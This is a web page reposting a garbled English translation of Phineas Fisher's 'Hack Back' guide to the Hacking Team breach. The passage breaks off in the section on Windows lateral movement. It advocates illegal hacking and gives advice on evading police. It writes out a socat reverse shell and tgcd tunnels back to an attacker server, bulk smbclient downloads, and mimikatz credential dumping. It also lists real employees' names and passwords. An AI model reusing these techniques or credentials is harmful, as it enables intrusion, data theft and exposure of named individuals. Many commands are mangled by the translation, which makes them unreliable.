ht_exploitation_en.html 45 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="utf-8">
  5. <title>Polybius Hacklab</title>
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7. <meta name="description" content="open source, hacklab, linux, libertarian, free, open, gpl">
  8. <meta name="author" content="">
  9. <!-- Le styles -->
  10. <link href="css/bootstrap.css" rel="stylesheet">
  11. <style type="text/css">
  12. body {
  13. padding-top: 60px;
  14. padding-bottom: 40px;
  15. }
  16. </style>
  17. <link href="css/bootstrap-responsive.css" rel="stylesheet">
  18. <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
  19. <!--[if lt IE 9]>
  20. <script src="js/html5shiv.js"></script>
  21. <![endif]-->
  22. <!-- Fav and touch icons -->
  23. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144-precomposed.png">
  24. <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114-precomposed.png">
  25. <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72-precomposed.png">
  26. <link rel="apple-touch-icon-precomposed" href="ico/apple-touch-icon-57-precomposed.png">
  27. <link rel="shortcut icon" href="ico/favicon.png">
  28. </head>
  29. <body>
  30. <div class="navbar navbar-inverse navbar-fixed-top">
  31. <div class="navbar-inner">
  32. <div class="container">
  33. <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
  34. <span class="icon-bar"></span>
  35. <span class="icon-bar"></span>
  36. <span class="icon-bar"></span>
  37. </button>
  38. <a class="brand" href="#">Polybius</a>
  39. <div class="nav-collapse collapse">
  40. <ul class="nav">
  41. <li><a href="index.html">Home</a></li>
  42. <li><a href="about.html">About</a></li>
  43. <li><a href="materiali.html">Help Us</a></li>
  44. <!--li><a href="#about">About</a></li>
  45. <li><a href="#contact">Contact</a></li-->
  46. <li class="dropdown">
  47. <a href="#" class="dropdown-toggle" data-toggle="dropdown">Docos<b class="caret"></b></a>
  48. <ul class="dropdown-menu">
  49. <li class="active"><a href="#">{en}Phineas Fisher - Pi$$ing on HT</a></li>
  50. <li><a href="PHZine00_it.html">{it}PHZine00</a></li>
  51. <!--li class="divider"></li>
  52. <li class="nav-header">Nav header</li>
  53. <li><a href="#">Separated link</a></li>
  54. <li><a href="#">One more separated link</a></li-->
  55. </ul>
  56. </li>
  57. </ul>
  58. <!--form class="navbar-form pull-right">
  59. <input class="span2" type="text" placeholder="Email">
  60. <input class="span2" type="password" placeholder="Password">
  61. <button type="submit" class="btn">Sign in</button>
  62. </form-->
  63. </div><!--/.nav-collapse -->
  64. </div>
  65. </div>
  66. </div>
  67. <div class="container">
  68. <!-- Example row of columns -->
  69. <div class="row">
  70. <div class="span11">
  71. <h1>{en} HackBack pissing on Hacking Team</h1>
  72. Here a the report of how How Hacking Team got hacked.
  73. We cut&pasted here because it represents a good example of what ethical hacking is and what means perform a penetration act (Information Gathering, Vulnerability Assessment, Exploitation, Privilege Escalation, Maintaining Access, Reporting) as well a funny and interesting "technical novel": a strongly recommended reading.</br>
  74. The original here: <a href="http://pastebin.com/0SNSvyjJ">http://pastebin.com/0SNSvyjJ</a>
  75. <p><pre><code>
  76. _ _ _ ____ _ _
  77. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  78. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  79. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  80. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  81. A DIY Guide
  82. ,-._,-._
  83. _,-\ o O_/;
  84. / , ` `|
  85. | \-.,___, / `
  86. \ `-.__/ / ,.\
  87. / `-.__.-\` ./ \'
  88. / /| ___\ ,/ `\
  89. ( ( |.-"` '/\ \ `
  90. \ \/ ,, | \ _
  91. \| o/o / \.
  92. \ , / /
  93. ( __`;-;'__`) \\
  94. `//'` `||` `\
  95. _// || __ _ _ _____ __
  96. .-"-._,(__) .(__).-""-. | | | | |_ _| |
  97. / \ / \ | | |_| | | | |
  98. \ / \ / | | _ | | | |
  99. `'-------` `--------'` __| |_| |_| |_| |__
  100. #antisec
  101. - [1 - Introduction] ------------------------------------------- ----------------
  102. You'll notice the language change since the last edition [1]. Speaking world
  103. English already has books, lectures, guides, and information about spare
  104. hacking. In this world there are many better I hackers, but unfortunately
  105. They squander their knowledge working for contractors "defense"
  106. for intelligence agencies to protect the banks and corporations and
  107. to defend the established order. The hacker culture was born in the US as a
  108. counterculture, but that source has remained in mere aesthetics - the rest has
  109. It has been assimilated. At least they can wear a shirt, dye her hair blue,
  110. hackers use their nicknames, and feel rebels while working for the
  111. system.
  112. Before someone had to sneak into the offices to filter documents [2].
  113. a gun to rob a bank was needed. Today you can do it from
  114. bed with a laptop in hands [3] [4]. As the CNT said after the
  115. Gamma hack Group: "we try to take another step forward with new
  116. forms of struggle "[5]. The hack is a powerful tool, let us learn and
  117. let's fight!
  118. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  119. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  120. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  121. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  122. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  123. - [2 - Hacking Team] ------------------------------------------ ----------------
  124. Hacking Team was a company that helped governments to hack and spy on
  125. journalists, activists, political opponents, and other threats to their power
  126. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]. And, very occasionally, criminals and
  127. terrorists [12]. A Vincenzetti, CEO, liked to finish his post with
  128. the fascist slogan "boia chi molla". It would be more successful "boia RCS sells chi".
  129. They also claimed to have technology to solve the "problem" of Tor and
  130. darknet [13]. But seeing that I still have my freedom, I have my doubts about
  131. their effectiveness.
  132. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  133. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  134. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  135. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  136. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  137. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  138. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  139. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  140. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  141. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  142. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  143. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  144. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  145. Unfortunately, our world is upside down. Enriches you do bad things
  146. and imprisons you do good things. Fortunately, thanks to the work
  147. hard for people such as "Tor project" [1], you can keep you from getting into the
  148. jail by a few simple guidelines:
  149. 1) Encrypt your hard drive [2]
  150. I guess when the police arrive to impound your computer,
  151. mean you've already made many mistakes, but better safe
  152. than cure.
  153. 2) Use a virtual machine and all traffic routed by Tor
  154. This accomplishes two things. First, that all connections are anonymized to
  155. through the Tor network. Second, keep personal life and anonymous life
  156. on different computers it helps you not to mix by accident.
  157. You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something
  158. personalized [6]. Here [7] there is a detailed comparison.
  159. 3) (Optional) Do not connect directly to the Tor network
  160. Tor is not the panacea. You can correlate the hours that you are connected
  161. Tor with the hours that your nickname is active hacker. There have also been
  162. successful attacks against the network [8]. You can connect to the Tor network through
  163. wifi others. Wifislax [9] is a Linux distribution with many
  164. tools to get wifi. Another option is to connect to a VPN or
  165. bridge node [10] before Tor, but is less secure because it still is
  166. They may correlate with hacker activity internet activity
  167. your home (this example was used as evidence against Jeremy Hammond
  168. [eleven]).
  169. The reality is that even though Tor is not perfect, it works quite well.
  170. When I was young and reckless, did many things without any protection (me
  171. referring to hacking) other than Tor, police made it impossible
  172. investigate, and I've never had problems.
  173. [1] https://www.torproject.org/
  174. [2] https://info.securityinabox.org/es/chapter-4
  175. [3] https://www.whonix.org/
  176. [4] https://tails.boum.org/
  177. [5] https://www.qubes-os.org/doc/privacy/torvm/
  178. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  179. [7] https://www.whonix.org/wiki/Comparison_with_Others
  180. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  181. [9] http://www.wifislax.com/
  182. [10] https://www.torproject.org/docs/bridges.html.en
  183. [eleven] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  184. ---- [3.1 - Infrastructure] ----------------------------------------- ----------
  185. No hacking directly with output relays Tor. They are blacklisted,
  186. They are very slow, and you can not receive reverse connections. Tor serves to
  187. protect my anonymity while I connect to the infrastructure used for
  188. hack, which consists of:
  189. 1) Domain Names
  190. Addresses used for command and control (C & C), and for tunnels
  191. DNS for insured egress.
  192. 2) Stable Servers
  193. It serves to C & C servers to receive reverse shells, to launch
  194. attacks and keep the loot.
  195. 3) Servers Hacked
  196. They serve as pivots to hide the IP of stable servers, and
  197. when I want a quick connection without pivot. For example scan ports,
  198. scan the whole internet, download a database with SQL injection,
  199. etc.
  200. Obviously you have to pay anonymously, as bitcoin (if you use it with
  201. watch out).
  202. ---- [3.2 - Allocation] ----------------------------------------- ---------------
  203. Often in the news that have attributed an attack on a group of
  204. governmental hackers (the "APTs"), because they always use the same
  205. tools, leaving the same fingerprints, and even use the same
  206. infrastructure (domains, mail etc). They neglect because they can hack
  207. without legal consequences.
  208. I did not want to make it easier for police work and relate what Hacking
  209. Team with hacks and nicknames of my daily work as a hacker glove
  210. black. So I used new servers and domains registered with new post
  211. and paid with new bitcoin address. In addition, only I used tools
  212. public and things that I wrote especially for this attack and changed my way
  213. to do some things to keep my normal forensic trace.
  214. - [4 - Gathering Information] ------------------------------------------ ---------
  215. Although it can be tedious, this stage is very important, because the more
  216. larger the attack surface, the easier it will be to find a fault in a
  217. portion thereof.
  218. ---- [4.1 - Technical Information] ---------------------------------------- -------
  219. Some tools and techniques are:
  220. 1) Google
  221. You can find many unexpected things with a couple of good searches
  222. picked. For example, the identity of DPR [1]. The bible of how to use
  223. google to hack is the book "Google Hacking for Penetration Testers".
  224. You can also find a brief summary in Spanish in [2].
  225. 2) Enumeration of subdomains
  226. Often the primary domain of a company is hosted by a third party, and
  227. you are getting the IP ranges of the company thanks to subdomains as
  228. mx.company.com, ns1.company.com etc. Also, sometimes there are things that should not be
  229. be exposed to "hidden" subdomains. Useful tools for
  230. discover domains and subdomains are fierce [3], theHarvester [4] and
  231. recon-ng [5].
  232. 3) reverse lookups and searches whois
  233. With a reverse search using the whois information of a domain or range
  234. IPs of a company, you can find others of their domains and ranges
  235. IPs. To my knowledge, there is no free way to do reverse lookups
  236. whois, apart from a "hack" with google:
  237. "Via della Moscova 13" site: www.findip-address.com
  238. "Via della Moscova 13" site: domaintools.com
  239. 4) Port scanning and fingerprinting
  240. Unlike other techniques, this speaks servers
  241. company. I include in this section because it is not an attack, it is only for
  242. gather information. The company IDS can generate an alert to
  243. scan ports, but you do not have to worry because all internet
  244. it is constantly being scanned.
  245. To scan, nmap [6] necessary, and can fingerprint most
  246. services discovered. For companies with very long ranges of IPs,
  247. ZMap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10]
  248. You can fingerprint websites.
  249. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  250. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  251. [3] http://ha.ckers.org/fierce/
  252. [4] https://github.com/laramies/theHarvester
  253. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  254. [6] https://nmap.org/
  255. [7] https://zmap.io/
  256. [8] https://github.com/robertdavidgraham/masscan
  257. [9] http://www.morningstarsecurity.com/research/whatweb
  258. [10] http://blindelephant.sourceforge.net/
  259. ---- [4.2 - Social Information] ---------------------------------------- --------
  260. For social engineering, it is very useful to collect information about
  261. employees, their roles, contact information, operating system, browser,
  262. plugins, software, etc. Some resources are:
  263. 1) Google
  264. Here too, it is the most useful tool.
  265. 2) theHarvester and recon-ng
  266. I have already mentioned in the previous section, but have much more
  267. functionality. You can find a lot of information quickly and
  268. automated. Worth reading all documentation.
  269. 3) LinkedIn
  270. You can find much information about the employees here. The
  271. Company recruiters are more likely to accept your requests.
  272. 4) Data.com
  273. Formerly known as jigsaw. You have the contact information of many
  274. employees.
  275. 5) Metadata file
  276. You can find lots of information about employees and their systems
  277. metadata files that the company has published. helpful Tools
  278. to find files on the website of the company and extract
  279. Metadata is metagoofil [1] and FOCA [2].
  280. [1] https://github.com/laramies/metagoofil
  281. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  282. - [5 - Entering the Network] ---------------------------------------- ------------
  283. There are several ways to make entry. Since the method I used for hacking
  284. team is rare and much more work than is usually necessary,
  285. I'll talk a bit about the two most common methods, I recommend trying
  286. First.
  287. ---- [5.1 - Social Engineering] ---------------------------------------- ---------
  288. social engineering, spear phishing specifically, is responsible for the
  289. Most hacking today. For an introduction in Spanish, see [1].
  290. For more information in English, see [2] (the third part, "Targeted
  291. Attacks "). For social engineering amusing anecdotes generations
  292. past, see [3]. I did not want to try spear phishing against Hacking Team,
  293. because your business is to help governments to spear phish their opponents.
  294. Therefore there is a much higher risk that recognize and Hacking Team
  295. investigate this attempt.
  296. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  297. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  298. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  299. ---- [5.2 - Buy Access] ---------------------------------------- ------------
  300. Thanks to painstaking Russians and their exploit kits, smugglers trafficking, and
  301. bot herders, many companies already have compromised computers within
  302. their networks. Almost all Fortune 500, with their huge networks have a
  303. bots already inside. However, Hacking Team is a very small company, and
  304. Most employees are experts in computer security, then there was
  305. little chance that were already committed.
  306. ---- [5.3 - Technical Operations] ---------------------------------------- -------
  307. After hacking Gamma Group, I described a process to search
  308. vulnerabilities [1]. Hacking Team has a range of public IP:
  309. inetnum: 93.62.139.32 - 93.62.139.47
  310. descr: HT public subnet
  311. Hacking Team had very little exposed to the internet. For example, different
  312. Gamma Group, your site customer needs a certificate
  313. client to connect. What he had was his main website (a blog Joomla
  314. that Joomscan [2] reveals no serious failure), a server post a
  315. pair of routers, two VPN devices, and a device for filtering spam.
  316. Then I had three options: find a 0day in Joomla, find a 0day in
  317. postfix, or find a 0day in one of the embedded systems. A 0day a
  318. embedded system seemed the most attainable option, and after two weeks
  319. reverse engineering work, I got a remote root exploit. Given the
  320. vulnerabilities have not yet been patched, I will not give more details.
  321. For more information on how to find these vulnerabilities, see
  322. [3] and [4].
  323. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  324. [2] http://sourceforge.net/projects/joomscan/
  325. [3] http://www.devttys0.com/
  326. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  327. - [6 - Be Prepared] ------------------------------------------ -------------
  328. I did a lot of work and testing before using the exploit against Hacking Team.
  329. I wrote a backdoor firmware, and compiled several tools
  330. post-exploitation for embedded system. The backdoor serves to protect the
  331. exploit. Use the exploit only once and then return by the backdoor ago
  332. work harder to find and patch vulnerabilities.
  333. The post-exploitation tools he had prepared were:
  334. 1) busybox
  335. For all common UNIX utilities that the system did not.
  336. 2) nmap
  337. To scan and fingerprint the internal network of Hacking Team.
  338. 3) Responder.py
  339. The most useful tool to attack Windows networks when you have access to
  340. the internal network but do not have a domain user.
  341. 4) Python
  342. To run Responder.py
  343. 5) tcpdump
  344. To snoop traffic.
  345. 6) dsniff
  346. Weak passwords to spy protocols such as ftp, and to make
  347. ARP spoofing. I wanted to use ettercap, written by the same ALOR and naga
  348. Hacking Team, but it was difficult to compile for the system.
  349. 7) socat
  350. For a comfortable shell with pty:
  351. my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puerto
  352. Hacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \
  353. tcp: my_server: I mi_puerto
  354. And for many other things, it is a Swiss Army knife of networking. See section
  355. Examples of documentation.
  356. 8) screen
  357. As socat pty is not strictly necessary, but I wanted to feel
  358. at home in networks Hacking Team.
  359. 9) a SOCKS proxy server
  360. To use with proxychains to access the internal network with any
  361. another program.
  362. 10) tgcd
  363. To forward ports, as SOCKS server through the firewall.
  364. [1] https://www.busybox.net/
  365. [2] https://nmap.org/
  366. [3] https://github.com/SpiderLabs/Responder
  367. [4] https://github.com/bendmorris/static-python
  368. [5] http://www.tcpdump.org/
  369. [6] http://www.monkey.org/~dugsong/dsniff/
  370. [7] http://www.dest-unreach.org/socat/
  371. [8] https://www.gnu.org/software/screen/
  372. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  373. [10] http://tgcd.sourceforge.net/
  374. The worst that could happen was that my backdoor or post-exploitation tools
  375. dejasen unstable the system and make an employee to investigate. By
  376. So I spent a week trying my exploit, backdoor, and tools
  377. post-operation over networks of other vulnerable companies before entering
  378. Network Hacking Team.
  379. - [7 - Look and Listen] ----------------------------------------- ----------
  380. Now within the internal network, I want to take a look and think before giving
  381. the next step. I turn Responder.py in analysis mode (-A, to listen without
  382. Poisoned answers), and make a slow scan with nmap.
  383. - [8 - NoSQL databases] ---------------------------------------- ----------
  384. NoSQL, or rather NoAutenticación has been a great gift to the community
  385. hacker [1]. When I worry that they have finally patched all failures
  386. Authentication Bypass in MySQL [2] [3] [4] [5] put new fashion base
  387. Data unauthenticated by design. Nmap is a few on the net
  388. Internal Hacking Team:
  389. 27017 / tcp open MongoDB MongoDB 2.6.5
  390. | mongodb-databases:
  391. | ok = 1
  392. | totalSizeMb = 47547
  393. | totalSize = 49856643072
  394. ...
  395. | _ Version = 2.6.5
  396. 27017 / tcp open MongoDB MongoDB 2.6.5
  397. | mongodb-databases:
  398. | ok = 1
  399. | totalSizeMb = 31987
  400. | totalSize = 33540800512
  401. | DATABASES
  402. ...
  403. | _ Version = 2.6.5
  404. Were the databases for RCS test instances. The audio recording
  405. RCS is stored in MongoDB with GridFS. The audio folder on torrent [6]
  406. It comes from this. Unwittingly they spied on themselves.
  407. [1] https://www.shodan.io/search?query=product%3Amongodb
  408. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  409. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  410. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  411. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  412. [6] https://ht.transparencytoolkit.org/audio/
  413. - [9 - Cables Cruzados] ------------------------------------------ -------------
  414. Although it was fun to listen to recordings and view images Hacking webcam
  415. Team developing its malware was not very useful. Unsteady copies of
  416. security vulnerability were opened. according to his
  417. documentation [1], its iSCSI devices must be on a separate network,
  418. but nmap find some in your 192.168.1.200/24 ​​subnet:
  419. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  420. ...
  421. 3260 / tcp open iscsi?
  422. | iscsi-info:
  423. | Target: iqn.2000-01.com.synology: ht-synology.name
  424. | Address: 192.168.200.66:3260,0
  425. | _ Authentication: No authentication required
  426. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  427. ...
  428. 3260 / tcp open iscsi?
  429. | iscsi-info:
  430. | Target: iqn.2000-01.com.synology: synology-backup.name
  431. | Address: 10.0.1.72:3260,0
  432. | Address: 192.168.200.72:3260,0
  433. | _ Authentication: No authentication required
  434. iSCSI requires a kernel module, and compile it would have been difficult for the
  435. embedded system. I forwarded the port to mount from a VPS:
  436. VPS: tgcd -L -p 3260 -q 42838
  437. Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838
  438. VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets
  439. Now you find the name iqn.2000-01.com.synology iSCSI but has problems
  440. when mounting because he believes his address is 192.168.200.72 instead of
  441. 127.0.0.1
  442. The way I solved was:
  443. iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1
  444. And now after:
  445. -m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login
  446. ... The device file appears! We ride:
  447. vmfs-fuse -o ro / dev / sdb1 / mnt / tmp
  448. and we find backups of multiple virtual machines. The server
  449. Exchange seems most interesting. It is too large to download,
  450. but we can mount remote and look for interesting files:
  451. $ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
  452. $ Fdisk -l / dev / loop0
  453. / Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT
  454. then the offset is 2048 * 512 = 1048576
  455. 1048576 $ losetup -o / dev / loop1 / dev / loop0
  456. $ Mount -o ro / dev / loop1 / mnt / exchange /
  457. now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014
  458. We find the hard drive of the virtual machine, and assemble:
  459. vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
  460. mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1
  461. ... And finally we unpacked the doll and we can see all
  462. the old Exchange server files in / mnt / part1
  463. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  464. - [10 - Backup to Domain Administrator] ---------------------
  465. What interests me most about the backup is to look if you have a
  466. or hash password you can use to access the current server. Use pwdump,
  467. cachedump, and lsadump [1] with the registry files. lsadump is the
  468. password account besadmin service:
  469. _SC_BlackBerry MDS Connection Service
  470. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  471. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
  472. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........
  473. proxychains [2] use the SOCKS server and embedded system
  474. smbclient [3] to check the password:
  475. proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '
  476. !Works! Besadmin password is still valid, and is an administrator
  477. local. I use my proxy and psexec_psh metasploit [4] for a session
  478. of meterpreter. Then I migrate to a 64-bit process, "load kiwi" [5]
  479. "Creds_wdigest", and I have many passwords, including the Administrator
  480. domain:
  481. HACKINGTEAM BESAdmin bes32678 !!!
  482. HACKINGTEAM Administrator uu8dd8ndd12!
  483. HACKINGTEAM c.pozzi P4ssword <---- sysadmin go!
  484. M.romeo HACKINGTEAM ioLK / (90
  485. L.guerra HACKINGTEAM 4luc@=.=
  486. HACKINGTEAM D.Martinez W4tudul3sp
  487. HACKINGTEAM g.russo GCBr0s0705!
  488. A.scarafile HACKINGTEAM Cd4432996111
  489. HACKINGTEAM r.viscardi Ht2015!
  490. HACKINGTEAM a.mino A! E $$ andra
  491. HACKINGTEAM m.bettini Ettore & Bella0314
  492. M.luppi HACKINGTEAM Blackou7
  493. HACKINGTEAM s.gallucci 1S9i8m4o!
  494. HACKINGTEAM d.milan set! Dob66
  495. HACKINGTEAM w.furlan Blu3.B3rry!
  496. HACKINGTEAM d.romualdi Rd13136f @ #
  497. HACKINGTEAM l.invernizzi L0r3nz0123!
  498. HACKINGTEAM e.ciceri 2O2571 & 2E
  499. HACKINGTEAM e.rabe erab @ 4HT!
  500. [1] https://github.com/Neohapsis/creddump7
  501. [2] http://proxychains.sourceforge.net/
  502. [3] https://www.samba.org/
  503. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  504. [5] https://github.com/gentilkiwi/mimikatz
  505. - [11 - Downloading Post] ----------------------------------------- ------
  506. Now that I have the password for the domain administrator, I have access to
  507. mails, the heart of the company. Because with every step I take is a
  508. risk of detection, I download mails before further exploring.
  509. Powershell makes it easy [1]. Interestingly, I found a bug with handling
  510. dates. After getting the mail, I took a couple of weeks in
  511. get the source and other code, so I returned occasionally to
  512. download new emails. The server was Italian, with the dates
  513. day / month / year. Use:
  514. -ContentFilter {(Received -ge '05 / 06/2015 ') -or (Sent -ge '05 / 06/2015')}
  515. with the New-MailboxExportRequest to download new mail (in this
  516. If all mail from June 5. The problem is that says
  517. the date is invalid if the day is greater than 12 (I guess this is because
  518. US that is the first month and month can not be greater than 12). Looks like
  519. Microsoft engineers have only tested their software with their own
  520. regional configuration.
  521. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  522. - [12 - Downloading Files] ------------------------------------------ -------
  523. Now I'm a domain administrator, I also began to download
  524. shares using my proxy and -Tc smbclient option for
  525. example:
  526. proxychains smbclient //192.168.1.230/FAE DiskStation '\
  527. -U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'
  528. So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders
  529. the torrent.
  530. - [13 - Introduction to Hacking Windows Domain] -----------------------
  531. Before continue telling the story of the Culiao Non-Windows, it should say something
  532. knowledge to attack Windows networks.
  533. ---- [13.1 - Lateral Movement] ---------------------------------------- -------
  534. I will give a brief overview of the techniques to spread within a network
  535. Windows. Techniques to run remotely require the password or
  536. hash of a local administrator on the target. By far the most common way
  537. to get such credentials is to use mimikatz [1], especially
  538. logonpasswords and sekurlsa sekurlsa :: :: mSv, on computers where you already have
  539. administrative access. Movement techniques "in situ" also Require
  540. administrative privileges (I except for runes). The more tools
  541. important privilege escalation are PowerUp [2], and bypassuac [3].
  542. [1] https://adsecurity.org/?page_id=1821
  543. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  544. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  545. Remote movement:
  546. 1) psexec
  547. The basic and proven way of moving windows networks. You can use
  548. psexec [1], winexe [2], psexec_psh metasploit [3], invoke_psexec of
  549. powershell empire [4], or the Windows command "sc" [5]. For module
  550. metasploit, powershell empire, and pth-winexe [6], enough to know the hash
  551. without knowing the password. It is the most universal way (works on any
  552. computer with port 445 open), but also way less
  553. cautious. It appears in the 7045 event log type "Service
  554. Control Manager. "In my experience, they have never realized for a
  555. hack, but sometimes you notice later and helps researchers understand
  556. what has made the hacker.
  557. 2) WMI
  558. more cautious way. WMI service is enabled on all
  559. Windows computers, but except for servers, the firewall blocks it
  560. default. You can use wmiexec.py [7] pth-WMIS [6] (here's a
  561. wmiexec demonstration and pth-WMIS [8]), invoke_wmi empire powershell
  562. [9], or the Windows command wmic [5]. All but need only wmic
  563. hash.
  564. 3) PSRemoting [10]
  565. It is disabled by default, and not advise enable new
  566. protocols that are not needed. But if the sysadmin already enabled,
  567. is very convenient, especially if you use powershell for all (and yes,
  568. you should use powershell for almost everything will change [11] with powershell 5
  569. and Windows 10, but now powershell day makes it easy to do everything in RAM,
